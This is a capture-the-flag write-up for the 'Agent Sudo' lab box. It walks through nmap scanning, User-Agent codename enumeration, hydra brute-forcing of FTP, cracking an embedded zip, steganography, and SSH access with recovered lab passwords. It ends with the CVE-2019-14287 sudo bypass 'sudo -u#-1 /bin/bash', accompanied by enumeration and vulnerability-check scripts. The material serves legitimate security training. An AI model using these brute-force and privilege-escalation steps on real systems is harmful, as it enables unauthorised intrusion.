Agent Sudo

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so nmap skips host discovery and scans even if the box drops ping probes:

nmap -Pn 10.10.89.53

We have 3 open ports (21, 22 and 80), which is the answer to the first question in this task.

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 21,22,80

  • (-oN nmap): Saving the normal output into a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.89.53

Task 2: Enumerate

Let's visit the website now and see what we are working with.

The page tells us to use our own codename as the User-Agent to access the site. The User-Agent is just a request header, so we can set it from the command line with curl and follow whatever redirect the server sends back:

Command Breakdown:

  • (-A): Specifying the user-agent

  • (-L): Follows any redirections

curl -A "R" -L 10.10.89.53

That returns a page, so the server is keying on the User-Agent. Since R is a single-letter codename, the other agents probably have single-letter codenames too. After trying a few letters, one of them gives a different result: codename C.

curl -A "C" -L 10.10.89.53

We can see that agent C's real name is Chris, which answers questions 2 and 3: we reach the secret page simply by changing the User-Agent header.
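Guessing the letters one at a time works, but it is quicker to script it. The following shell script is an added example for this writeup, not part of the original page: it requests the site once with a normal browser User-Agent as the baseline, then once with every single letter A to Z, and prints the letters whose response body differs from the baseline (with -L so a redirect to a hidden page shows up as that page's content). The target address and the baseline User-Agent are assumptions; set TARGET to point it at another box.

```shell
#!/bin/sh
# Enumerate single-letter User-Agent "codenames" and report the ones the
# server treats specially. Added example for this writeup; TARGET and the
# baseline User-Agent are assumptions, not values from the original page.

TARGET="${TARGET:-10.10.89.53}"
BASELINE_AGENT="${BASELINE_AGENT:-Mozilla/5.0}"   # an ordinary browser UA

# fetch_page <user-agent>: GET the site with that User-Agent, following
# redirects (-L) so a 302 to a hidden page is returned as that page's body.
fetch_page() {
    curl -s -A "$1" -L "http://$TARGET/"
}

# find_codenames [fetch-function]: compare every letter A-Z against the
# baseline response and print the letters whose content differs. The
# fetch function is a parameter so the logic can be exercised offline.
find_codenames() {
    fetch="${1:-fetch_page}"
    baseline=$("$fetch" "$BASELINE_AGENT")
    for c in A B C D E F G H I J K L M N O P Q R S T U V W X Y Z; do
        body=$("$fetch" "$c")
        if [ "$body" != "$baseline" ]; then
            printf '%s\n' "$c"
        fi
    done
}

# Only touch the network when explicitly asked (RUN=1 sh codenames.sh),
# so the functions can be sourced or tested without a target.
if [ "${RUN:-0}" = "1" ]; then
    find_codenames
fi
```

Run it with `RUN=1 sh codenames.sh`; each letter it prints is worth requesting by hand with `curl -A "<letter>" -L` to read the page the server serves for that agent.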

The name of the agent is Chris

Task 3: Hash cracking and brute-forcing

Now that we have a username, we can try brute-forcing the FTP service on port 21 with hydra.

Command Breakdown:

  • (-l): Specifying username

  • (-P): Specifying a wordlist of candidate passwords

  • (ftp): Specifying which protocol/service to attack

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.89.53 ftp

Hydra finds the password, which is also the answer to the first question of this task.

Now log in to FTP as chris with that password:

ftp 10.10.89.53

Lets list what is there in the server.

There are three files. We cannot view their contents from the FTP prompt, so download them to our machine with get (run binary first so the images are not mangled by ASCII mode, or use prompt followed by mget * to fetch all three at once):

get <file_name>

Of the three files, one is a text file, so read it first:

cat To_agentJ.txt

The note says the password is hidden in one of the pictures we downloaded. binwalk scans a file for embedded file signatures (archives, images, firmware and so on), so run it against the PNG:

binwalk cutie.png

binwalk reports a zip archive embedded inside the PNG, so extract it with the (-e) flag:

binwalk -e cutie.png

binwalk writes the extracted files into a directory named _cutie.png.extracted. The zip in there is password-protected, so convert it into a crackable hash with zip2john, the helper that ships with John the Ripper:

zip2john 8702.zip > hash.txt

Now crack the hash with John the Ripper (john --show hash.txt redisplays the cracked password later):

john hash.txt

The password is alien, which is also the answer to the second question in this task.

Extract the archive with 7-Zip; it prompts for the password (you can also pass it inline with -p<password>):

7z e 8702.zip

Inside is a new file called To_agentR.txt; read it:

cat To_agentR.txt

The note contains an encoded string. Paste it into CyberChef: it is base64, and it decodes to Area51, which looks like a passphrase. Try it on the other image we downloaded from FTP with steghide, which prompts for the passphrase (or takes it with -p):

steghide --extract -sf cute-alien.jpg

steghide writes out message.txt; read it:

cat message.txt

The message is addressed to James and gives his login password, hackerrules, so we can SSH into the machine with those credentials. It also tells us the name of the other agent, James. With this information we can answer the last three questions of this task.

Task 4: Capture The User Flag

Now log in over SSH as james, since we have his password:

ssh james@10.10.71.234

The user flag is in the /home/james directory and is the answer to the first question of the task. There is also another file, Alien_autospy.jpg, and the second question asks what incident the photo shows. To look at it we first copy it to our machine with scp (the remote path is relative to james's home directory):

scp james@10.10.71.234:Alien_autospy.jpg /root/Desktop/TryHackMe/AgentSudo

The last argument is the local directory the file is saved into.

Now that the file is on our machine, a reverse image search tells us which incident it is connected to. Go to Google Images, click the camera icon and choose the upload option.

Upload the file and the results point to the Roswell incident. The answer to the last question in this section is Roswell Alien Autopsy.

Task 5: Privilege Escalation

The first command to run is sudo -l, which lists the commands the current user may run through sudo and as which users:

sudo -l

The rule (ALL, !root) /bin/bash means james may run /bin/bash as any user except root. Searching for that pattern leads to CVE-2019-14287, a bug in sudo versions before 1.8.28: a numeric user ID of -1 (or its unsigned form 4294967295) passed with -u# is not root's UID 0, so it is not blocked by the !root exclusion, but the setresuid()-style calls treat -1 as "leave unchanged", and since sudo is already running as root the command ends up running as root. The bypass is a single command:

sudo -u#-1 /bin/bash

We are now root, and the root flag is in the /root directory. This also answers the first and second questions of this task.
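The two preconditions for this escalation are a sudo older than 1.8.28 and a rule whose runas list excludes root. The following shell script is an added example for this writeup (not part of the original page) that checks both from the sudo version string and the text of sudo -l, so you can tell before trying the bypass whether it should work. The sample sudo -l text embedded in it is constructed in the shape sudo prints, around the (ALL, !root) /bin/bash line seen above.

```shell
#!/bin/sh
# Decide whether a host is exposed to CVE-2019-14287 from two inputs: the
# sudo version and the output of "sudo -l". Added example for this writeup,
# not part of the original page; SAMPLE_SUDO_L below is constructed.

# sudo_version_vulnerable <version>: returns 0 (true) when the version is
# older than 1.8.28, the release that fixed the -u#-1 bug. Accepts forms
# like "1.8.21p2", "1.8.27" and "1.9"; the "pN" patch suffix is ignored.
sudo_version_vulnerable() {
    v=$(printf '%s' "$1" | sed 's/p[0-9]*$//')
    major=${v%%.*}
    rest=${v#*.}
    if [ "$rest" = "$v" ]; then rest=""; fi      # no minor component
    minor=${rest%%.*}
    rest=${rest#*.}
    if [ "$rest" = "$minor" ]; then rest=""; fi  # no patch component
    patch=${rest%%.*}
    : "${minor:=0}" "${patch:=0}"
    if [ "$major" -lt 1 ]; then return 0; fi
    if [ "$major" -gt 1 ]; then return 1; fi
    if [ "$minor" -lt 8 ]; then return 0; fi
    if [ "$minor" -gt 8 ]; then return 1; fi
    if [ "$patch" -lt 28 ]; then return 0; fi
    return 1
}

# sudoers_has_not_root_rule <sudo -l output>: returns 0 when some rule's
# runas specification excludes root, i.e. the "(ALL, !root) cmd" shape
# that -u#-1 sidesteps on an unpatched sudo.
sudoers_has_not_root_rule() {
    printf '%s\n' "$1" | grep -q '^[[:space:]]*([^)]*!root[^)]*)'
}

# cve_2019_14287_applies <version> <sudo -l output>: both conditions hold.
cve_2019_14287_applies() {
    sudo_version_vulnerable "$1" && sudoers_has_not_root_rule "$2"
}

# Constructed sample in the shape "sudo -l" prints, for offline use.
SAMPLE_SUDO_L='Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash'

# With RUN=1 the script inspects the host it is running on.
if [ "${RUN:-0}" = "1" ]; then
    ver=$(sudo --version | head -n 1 | awk '{print $3}')   # "Sudo version X"
    rules=$(sudo -l)
    if cve_2019_14287_applies "$ver" "$rules"; then
        echo "sudo $ver with a (ALL, !root) rule: sudo -u#-1 /bin/bash should give a root shell"
    else
        echo "sudo $ver: CVE-2019-14287 does not apply here"
    fi
fi
```

Run it on the target as james with `RUN=1 sh check.sh`. Either spelling of the bypass works on an affected sudo, `sudo -u#-1 /bin/bash` or `sudo -u#4294967295 /bin/bash`, and the auth log records the attempt with the bogus UID, which is also a useful thing to alert on.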

The answer to the third question is found in root.txt as well.
